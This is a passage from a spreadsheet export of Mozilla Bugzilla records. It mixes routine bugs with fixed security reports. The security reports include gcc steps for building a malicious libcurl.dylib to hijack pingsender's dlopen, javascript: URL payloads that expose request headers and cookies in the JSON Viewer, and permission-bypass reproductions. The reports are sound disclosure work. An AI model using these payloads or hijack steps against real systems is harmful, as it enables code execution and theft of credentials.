          <t>"Bookmark Added" snackbar overlaps the menu</t>
        </is>
      </c>
      <c r="D4566" t="inlineStr">
        <is>
          <t>2017-10-27 07:36:34 -0700</t>
        </is>
      </c>
      <c r="E4566" t="n">
        <v>1</v>
      </c>
      <c r="F4566" t="n">
        <v>1</v>
      </c>
      <c r="G4566" t="n">
        <v>2</v>
      </c>
      <c r="H4566" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4566" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J4566" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4566" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4566" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4566" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N4566" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4566" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4566" t="inlineStr"/>
      <c r="Q4566" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4566" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4566" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4566" t="n">
        <v>1</v>
      </c>
      <c r="U4566" t="n">
        <v>0</v>
      </c>
      <c r="V4566" t="n">
        <v>4</v>
      </c>
      <c r="W4566" t="inlineStr">
        <is>
          <t>Created attachment 8918824
Screen Shot 2017-10-16 at 14.27.34.png
latest master 
iPhone 6 Plus (10.3.3)
1. Open a webpage.
2. Open the page action menu and select "Bookmark This Page".
3. While the "Bookmark Added" snackbar is being displayed, open the menu.
Expected: The snackbar should be dismissed when opening the menu.
Actual: The snackbar overlaps the menu.</t>
        </is>
      </c>
      <c r="X4566" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4567">
      <c r="A4567" t="n">
        <v>1401339</v>
      </c>
      <c r="B4567" t="inlineStr">
        <is>
          <t>2017-09-19 13:46:12 -0700</t>
        </is>
      </c>
      <c r="C4567" t="inlineStr">
        <is>
          <t>The pingsender executable dynamically loads libcurl, using dlopen and hardcoded library list. [Mac/Linux]</t>
        </is>
      </c>
      <c r="D4567" t="inlineStr">
        <is>
          <t>2024-05-30 09:36:54 -0700</t>
        </is>
      </c>
      <c r="E4567" t="n">
        <v>1</v>
      </c>
      <c r="F4567" t="n">
        <v>1</v>
      </c>
      <c r="G4567" t="n">
        <v>3</v>
      </c>
      <c r="H4567" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4567" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4567" t="inlineStr">
        <is>
          <t>Telemetry</t>
        </is>
      </c>
      <c r="K4567" t="inlineStr">
        <is>
          <t>54 Branch</t>
        </is>
      </c>
      <c r="L4567" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4567" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4567" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4567" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4567" t="inlineStr">
        <is>
          <t>[adv-main57+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4567" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4567" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4567" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T4567" t="n">
        <v>1</v>
      </c>
      <c r="U4567" t="n">
        <v>0</v>
      </c>
      <c r="V4567" t="n">
        <v>31</v>
      </c>
      <c r="W4567" t="inlineStr">
        <is>
          <t>Created attachment 8909974
poc.c
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Steps to reproduce:
Introduction:
The pingsender executable dynamically loads libcurl, using dlopen and hardcoded library list.
According to the manpages, the order of execution for dlopen will be:
     When path does not contain a slash character (i.e. it is just a leaf name), dlopen() searches the following until it finds a compatible Mach-O file:
     $LD_LIBRARY_PATH, $DYLD_LIBRARY_PATH, current working directory, $DYLD_FALLBACK_LIBRARY_PATH.
Further:
	 Note: If DYLD_FALLBACK_LIBRARY_PATH is not set, dlopen operates as if DYLD_FALLBACK_LIBRARY_PATH was set to $HOME/lib:/usr/local/lib:/usr/lib.
The vulnerable file is located on: https://dxr.mozilla.org/mozilla-central/source/toolkit/components/telemetry/pingsender/pingsender_unix_common.cpp
The offending dlopen code dlopen is in line 105
		mLib = dlopen(libname, RTLD_NOW);
And in line 84 through 101:
		 const char* libcurlNames[] = {
		    "libcurl.so",
		    "libcurl.so.4",
		    // Debian gives libcurl a different name when it is built against GnuTLS
		    "libcurl-gnutls.so.4",
		    // Older libcurl if we can't find anything better
		    "libcurl.so.3",
		#ifndef HAVE_64BIT_BUILD
		    // 32-bit versions on 64-bit hosts
		    "/usr/lib32/libcurl.so",
		    "/usr/lib32/libcurl.so.4",
		    "/usr/lib32/libcurl-gnutls.so.4",
		    "/usr/lib32/libcurl.so.3",
		#endif
		    // macOS
		    "libcurl.dylib",
		    "libcurl.4.dylib",
		    "libcurl.3.dylib"
		  };
By writing a malicious dylib, in ~/lib, an attacker can attain local execution privileges.
Further - on every subsequent telemetry request, the code will be executed.
Instruction to reproduce:
Save the C file and compile to generate a dyilib:
gcc -c poc.c
gcc -dynamiclib -current_version 1.0  poc.o  -o libcurl.dylib
Ensure that Enable Firefox Health Report is enabled On Firefox -&gt; Preferences -&gt; Advanced -&gt; Data Choices 
Open and close Firefox.
This is a bad security practice, you can read more about it (although on a Windows world) on:
http://blog.opensecurityresearch.com/2014/01/unsafe-dll-loading-vulnerabilities.html
Actual results:
Code was executed (Calculator was opened)
Expected results:
A list with the known paths should had been provided.</t>
        </is>
      </c>
      <c r="X4567" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4568">
      <c r="A4568" t="n">
        <v>669419</v>
      </c>
      <c r="B4568" t="inlineStr">
        <is>
          <t>2011-07-05 12:26:25 -0700</t>
        </is>
      </c>
      <c r="C4568" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of Fennec 6.0b1</t>
        </is>
      </c>
      <c r="D4568" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4568" t="n">
        <v>1</v>
      </c>
      <c r="F4568" t="n">
        <v>1</v>
      </c>
      <c r="G4568" t="n">
        <v>5</v>
      </c>
      <c r="H4568" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4568" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4568" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4568" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4568" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4568" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4568" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4568" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4568" t="inlineStr"/>
      <c r="Q4568" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4568" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4568" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4568" t="n">
        <v>1</v>
      </c>
      <c r="U4568" t="n">
        <v>0</v>
      </c>
      <c r="V4568" t="n">
        <v>4</v>
      </c>
      <c r="W4568" t="inlineStr">
        <is>
          <t>Waiting for "go to build" email.</t>
        </is>
      </c>
      <c r="X4568" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4569">
      <c r="A4569" t="n">
        <v>1794622</v>
      </c>
      <c r="B4569" t="inlineStr">
        <is>
          <t>2022-10-11 08:45:22 -0700</t>
        </is>
      </c>
      <c r="C4569" t="inlineStr">
        <is>
          <t>requestFullscreen without fullscreen notification toast with unresponsive script and navigate to another website</t>
        </is>
      </c>
      <c r="D4569" t="inlineStr">
        <is>
          <t>2024-05-30 11:01:34 -0700</t>
        </is>
      </c>
      <c r="E4569" t="n">
        <v>1</v>
      </c>
      <c r="F4569" t="n">
        <v>1</v>
      </c>
      <c r="G4569" t="n">
        <v>3</v>
      </c>
      <c r="H4569" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4569" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4569" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4569" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4569" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4569" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4569" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4569" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4569" t="inlineStr">
        <is>
          <t>[adv-esr102.8+][adv-main110+][reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q4569" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4569" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4569" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T4569" t="n">
        <v>1</v>
      </c>
      <c r="U4569" t="n">
        <v>0</v>
      </c>
      <c r="V4569" t="n">
        <v>25</v>
      </c>
      <c r="W4569" t="inlineStr">
        <is>
          <t>Created attachment 9298016
testcase.bundle.html
When invoke `requestFullscreen` then run unresponsive script that blocking the main thread or freeze the page then simultaneously navigate to another website, interestingly the browser goes fullscreen without fullscreen notification toast on another website.
When in the fullscreen mode the page is still responsive and interactable as usual, the browser will stays in full screen mode as long as the unresponsive script is running in the background, when unresponsive script is over the browser will exit the full screen mode.
## Tested on:
- Firefox 105.0.3 (64-bit) on Arch Linux
- Firefox 105.0.3 (64-bit) on Windows 11
- Firefox Nightly 107.0a1 (2022-10-11) (64-bit) on Arch Linux
- Firefox Nightly 107.0a1 (2022-10-11) (64-bit) on Windows 11
## Steps to reproduce:
1. Visit attached testcase.bundle.html
2. Click "Launch"
3. Click anywhere on the page
4. Browser goes fullscreen without fullscreen notification toast</t>
        </is>
      </c>
      <c r="X4569" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4570">
      <c r="A4570" t="n">
        <v>1447969</v>
      </c>
      <c r="B4570" t="inlineStr">
        <is>
          <t>2018-03-22 05:07:49 -0700</t>
        </is>
      </c>
      <c r="C4570" t="inlineStr">
        <is>
          <t>Old console and current debugger linkify javascript: URLs</t>
        </is>
      </c>
      <c r="D4570" t="inlineStr">
        <is>
          <t>2024-05-30 09:44:09 -0700</t>
        </is>
      </c>
      <c r="E4570" t="n">
        <v>1</v>
      </c>
      <c r="F4570" t="n">
        <v>1</v>
      </c>
      <c r="G4570" t="n">
        <v>3</v>
      </c>
      <c r="H4570" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4570" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J4570" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4570" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4570" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4570" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4570" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4570" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4570" t="inlineStr">
        <is>
          <t>[adv-main60+]</t>
        </is>
      </c>
      <c r="Q4570" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4570" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4570" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T4570" t="n">
        <v>1</v>
      </c>
      <c r="U4570" t="n">
        <v>0</v>
      </c>
      <c r="V4570" t="n">
        <v>25</v>
      </c>
      <c r="W4570" t="inlineStr">
        <is>
          <t>A response returning application/json will be displayed in the JSON Viewer and links in the data will be linkified. While this might be convenient, javascript: links will also be linkified. Web services don't expect that JSON output needs to be sanitized, so injecting a javascript: URL into the output is often trivial. See for example this Mozilla URL:
&gt; https://token.services.mozilla.com/1.0/sync/javascript:alert(JSON.stringify(JSONView.headers.request%29%29
If the user somehow clicks value of the errors.0.name property an alert message will show up - JavaScript code executed successfully. And while the principal is set to the null principal so that the code cannot access document.cookies for example, it can access the JSONView object injected by the JSON Viewer. That object contains among other things all request headers - meaning also cookies and authorization tokens.
This JavaScript code can also trigger saving of arbitrary content, though that shouldn't be as critical:
&gt; https://token.services.mozilla.com/1.0/sync/javascript:void(window.dispatchEvent(new%2520CustomEvent(%2527contentMessage%2527,%7Bdetail:%7Btype:%2527save%2527,value:%2527data:,foobar%2527%7D%7D%29%29%29
Clearly, JSON Viewer should only linkify HTTP and HTTPS URLs. For reference, the problematic code line is https://dxr.mozilla.org/mozilla-central/rev/6ff60a083701d08c52702daf50f28e8f46ae3a1c/devtools/client/shared/components/reps/reps.js#88. While this also allows data: and chrome: URLs, browser security mechanisms will no longer allow navigating to those.</t>
        </is>
      </c>
      <c r="X4570" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4571">
      <c r="A4571" t="n">
        <v>831576</v>
      </c>
      <c r="B4571" t="inlineStr">
        <is>
          <t>2013-01-16 16:35:07 -0800</t>
        </is>
      </c>
      <c r="C4571" t="inlineStr">
        <is>
          <t>Solitude proxy for Bango</t>
        </is>
      </c>
      <c r="D4571" t="inlineStr">
        <is>
          <t>2013-01-18 09:25:14 -0800</t>
        </is>
      </c>
      <c r="E4571" t="n">
        <v>1</v>
      </c>
      <c r="F4571" t="n">
        <v>1</v>
      </c>
      <c r="G4571" t="n">
        <v>6</v>
      </c>
      <c r="H4571" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4571" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J4571" t="inlineStr">
        <is>
          <t>Payments/Refunds</t>
        </is>
      </c>
      <c r="K4571" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L4571" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4571" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4571" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4571" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4571" t="inlineStr">
        <is>
          <t>u=mkt p=2</t>
        </is>
      </c>
      <c r="Q4571" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4571" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4571" t="inlineStr">
        <is>
          <t>2013-01-17</t>
        </is>
      </c>
      <c r="T4571" t="n">
        <v>1</v>
      </c>
      <c r="U4571" t="n">
        <v>0</v>
      </c>
      <c r="V4571" t="n">
        <v>2</v>
      </c>
      <c r="W4571" t="inlineStr">
        <is>
          <t>The proxy worked for a while, until we started sending more sophisticated SOAP data. That data is not JSON serializable, meaning my naive serialise things as JSON, pass it to the proxy etc isn't going to work and I'm going to have dig it into suds or do it all as XML.
Once this is fixed we can turn the solitude proxy back on.</t>
        </is>
      </c>
      <c r="X4571" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4572">
      <c r="A4572" t="n">
        <v>1802385</v>
      </c>
      <c r="B4572" t="inlineStr">
        <is>
          <t>2022-11-24 16:15:29 -0800</t>
        </is>
      </c>
      <c r="C4572" t="inlineStr">
        <is>
          <t>After redirect to moz-extension:-URL in the parent process, the URL changes to the underlying jar/file-URL</t>
        </is>
      </c>
      <c r="D4572" t="inlineStr">
        <is>
          <t>2023-10-17 20:40:42 -0700</t>
        </is>
      </c>
      <c r="E4572" t="n">
        <v>1</v>
      </c>
      <c r="F4572" t="n">
        <v>1</v>
      </c>
      <c r="G4572" t="n">
        <v>3</v>
      </c>
      <c r="H4572" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4572" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J4572" t="inlineStr">
        <is>
          <t>Request Handling</t>
        </is>
      </c>
      <c r="K4572" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4572" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4572" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4572" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4572" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4572" t="inlineStr">
        <is>
          <t>[addons-jira][adv-main111+]</t>
        </is>
      </c>
      <c r="Q4572" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4572" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4572" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T4572" t="n">
        <v>1</v>
      </c>
      <c r="U4572" t="n">
        <v>0</v>
      </c>
      <c r="V4572" t="n">
        <v>11</v>
      </c>
      <c r="W4572" t="inlineStr">
        <is>
          <t>STR:
1. Open the global browser console.
2. Run the following snippet:
  `await fetch("https://polished-glitter-21ad.hvfcetgxgijelkmhxy.workers.dev/redirect?url=" + WebExtensionPolicy.getByID('webcompat@mozilla.org').getURL('shims/live-test-shim.js') )`
   - Note: this snippet relies on [the built-in webcompat add-on that has a web-accessible file (shims/live-test-shim.js)](https://searchfox.org/mozilla-central/rev/fadd0a14d2a2724ee4733ef73970a2ddd457a43f/browser/extensions/webcompat/manifest.json#130). If the add-on ever disappears, create an extension with a file in `web_accessible_resources`, get the `moz-extension:`-URL to that file and call `fetch` on it.
3. Look at the reported URL.
Expected:
- It should be the `moz-extension://uuid/shims/live-test-shim.js` URL
Actual:
- It is the path to the underlying file or jar:-URL.
- Example from local Firefox build: `file:///path/to/mozilla-central/browser/extensions/webcompat/shims/live-test-shim.js`
- Example for a xpi file: `jar:file:///path/to/addon-file.xpi!/shims/live-test-shim.js`
This is especially a problem on Android, where extensions run in-process (i.e. `extensions.webextensions.remote` = false, until bug 1535365 is fixed). This means that a `fetch` from an extension page can leak the path of the underlying filesystem.</t>
        </is>
      </c>
      <c r="X4572" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4573">
      <c r="A4573" t="n">
        <v>564679</v>
      </c>
      <c r="B4573" t="inlineStr">
        <is>
          <t>2010-05-09 06:09:50 -0700</t>
        </is>
      </c>
      <c r="C4573" t="inlineStr">
        <is>
          <t>Bytes mapped to U+FFFD in 8-bit encodings make the following byte/character disappear</t>
        </is>
      </c>
      <c r="D4573" t="inlineStr">
        <is>
          <t>2010-07-20 16:15:35 -0700</t>
        </is>
      </c>
      <c r="E4573" t="n">
        <v>1</v>
      </c>
      <c r="F4573" t="n">
        <v>1</v>
      </c>
      <c r="G4573" t="n">
        <v>3</v>
      </c>
      <c r="H4573" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4573" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4573" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K4573" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4573" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4573" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4573" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4573" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4573" t="inlineStr">
        <is>
          <t>[sg:moderate] possible XSS hazard</t>
        </is>
      </c>
      <c r="Q4573" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4573" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4573" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4573" t="n">
        <v>1</v>
      </c>
      <c r="U4573" t="n">
        <v>0</v>
      </c>
      <c r="V4573" t="n">
        <v>19</v>
      </c>
      <c r="W4573" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.3a5pre) Gecko/20100508 Minefield/3.7a5pre
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.3a5pre) Gecko/20100508 Minefield/3.7a5pre
Many 8-bit encodings contain undefined positions, which are mapped to U+FFFD. In the last Minefield for Mac, such bytes are correctly mapped to U+FFFD, but the immediately following byte disappears(!).
For example, the sequence {'\xD1', '\xD2', '\xD3', 'xD4'} in windows-1253 should result in {U+3A1, U+FFFD, U+3A3, U+3A4} (i.e., the string "Ρ�ΣΤ"), but the actual result is the shorter sequence {U+3A1, U+FFFD, U+3A4} with no U+3A3 character (i.e., the string "Ρ�Τ", with no 'Σ').
(Two consecutive bytes both mapped to U+FFFD result in only one U+FFFD character instead of two.)
This seems to be a general problem; it does apply to several windows-* and ISO-8859-* encodings.
Firefox 3.6.3 (release) shows the same incorrect behaviour. This bug did not exist in Firefox 3.5.8.
[Incidentally, it might make sense to map bytes in the range 0x7F..0x9F to U+7F..U+9F and not to U+FFFD for many of the affected encodings, but that is a separate issue and would in any case not solve the current problem completely since many encodings, including windows-1253, have undefined characters outside this range, for which U+FFFD is the only reasonable mapping.]
Reproducible: Always</t>
        </is>
      </c>
      <c r="X4573" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4574">
      <c r="A4574" t="n">
        <v>939377</v>
      </c>
      <c r="B4574" t="inlineStr">
        <is>
          <t>2013-11-15 20:13:15 -0800</t>
        </is>
      </c>
      <c r="C4574" t="inlineStr">
        <is>
          <t>[Bluetooth] 1.3 Visual Refresh of Bluetooth Icons</t>
        </is>
      </c>
      <c r="D4574" t="inlineStr">
        <is>
          <t>2014-03-12 02:16:31 -0700</t>
        </is>
      </c>
      <c r="E4574" t="n">
        <v>1</v>
      </c>
      <c r="F4574" t="n">
        <v>1</v>
      </c>
      <c r="G4574" t="n">
        <v>6</v>
      </c>
      <c r="H4574" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4574" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4574" t="inlineStr">
        <is>
          <t>Gaia::System</t>
        </is>
      </c>
      <c r="K4574" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4574" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4574" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4574" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4574" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4574" t="inlineStr">
        <is>
          <t>ux-tracking, visual design, visual-tracking, jian</t>
        </is>
      </c>
      <c r="Q4574" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4574" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4574" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4574" t="n">
        <v>1</v>
      </c>
      <c r="U4574" t="n">
        <v>0</v>
      </c>
      <c r="V4574" t="n">
        <v>14</v>
      </c>
      <c r="W4574" t="inlineStr">
        <is>
          <t>Created attachment 833301
Bluetooth_sprite.zip
Hi Pavel,
Please update the Bluetooth sprites with the @1 and @1.5 sprites attached. 
Thanks!</t>
        </is>
      </c>
      <c r="X4574" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4575">
      <c r="A4575" t="n">
        <v>1619773</v>
      </c>
      <c r="B4575" t="inlineStr">
        <is>
          <t>2020-03-03 13:13:12 -0800</t>
        </is>
      </c>
      <c r="C4575" t="inlineStr">
        <is>
          <t>UR team H1 Goals Prioritization</t>
        </is>
      </c>
      <c r="D4575" t="inlineStr">
        <is>
          <t>2020-03-03 13:14:36 -0800</t>
        </is>
      </c>
      <c r="E4575" t="n">
        <v>1</v>
      </c>
      <c r="F4575" t="n">
        <v>1</v>
      </c>
      <c r="G4575" t="n">
        <v>5</v>
      </c>
      <c r="H4575" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4575" t="inlineStr">
        <is>
          <t>User Research</t>
        </is>
      </c>
      <c r="J4575" t="inlineStr">
        <is>
          <t>Project Request</t>
        </is>
      </c>
      <c r="K4575" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4575" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4575" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4575" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4575" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4575" t="inlineStr"/>
      <c r="Q4575" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4575" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4575" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4575" t="n">
        <v>1</v>
      </c>
      <c r="U4575" t="n">
        <v>0</v>
      </c>
      <c r="V4575" t="n">
        <v>2</v>
      </c>
      <c r="W4575" t="inlineStr">
        <is>
          <t>**Request Description** 
(What question are you trying to answer?)
Organized the team goals/trees from All-Hands, put together survey re: how we wanted to prioritize those goals as a team, and put together deck for shareout with UR team. 
**Deadline** 
(Is there a specific date you need the results by? FYI - We may not be able to meet this deadline.) 
n/a 
**Priority Level** 
(1 = High 2 = Medium, 3 = Low):
2 
**Priority Level Description** 
(Please provide information on how you chose the priority level above, which product management OKR(s) this work supports, or any other details that will help us triage and prioritize this request.) 
**Supporting Information**
(Links to any assets or previous research relevant to this project.)</t>
        </is>
      </c>
      <c r="X4575" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4576">
      <c r="A4576" t="n">
        <v>1261933</v>
      </c>
      <c r="B4576" t="inlineStr">
        <is>
          <t>2016-04-04 13:00:55 -0700</t>
        </is>
      </c>
      <c r="C4576" t="inlineStr">
        <is>
          <t>mozRequestFullScreen + mozRequestPointerLock: bypassing pointer lock permission</t>
        </is>
      </c>
      <c r="D4576" t="inlineStr">
        <is>
          <t>2024-05-30 09:15:57 -0700</t>
        </is>
      </c>
      <c r="E4576" t="n">
        <v>1</v>
      </c>
      <c r="F4576" t="n">
        <v>1</v>
      </c>
      <c r="G4576" t="n">
        <v>3</v>
      </c>
      <c r="H4576" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4576" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4576" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4576" t="inlineStr">
        <is>
          <t>45 Branch</t>
        </is>
      </c>
      <c r="L4576" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4576" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N4576" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4576" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4576" t="inlineStr">
        <is>
          <t>[adv-main47+][adv-esr45.2+]</t>
        </is>
      </c>
      <c r="Q4576" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4576" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4576" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T4576" t="n">
        <v>1</v>
      </c>
      <c r="U4576" t="n">
        <v>0</v>
      </c>
      <c r="V4576" t="n">
        <v>40</v>
      </c>
      <c r="W4576" t="inlineStr">
        <is>
          <t>Created attachment 8737914
Show case.html
JavaScript: Calling mozRequestFullScreen followed by mozRequestPointerLock or vice versa causes some interesting bugs, especially when paired with window.close().
In the attached file there are three buttons that showcase some of these bugs:
Crash firefox!:
- Crashes Firefox. Crash report: https://crash-stats.mozilla.com/report/index/ce29f731-9d98-40ee-9391-d6a832160404 
Cursor Lock without permission and apply to all firefox windows!:
- Causes the permission popup for mozRequestPointerLock to not show up, permission is immediately granted instead. 
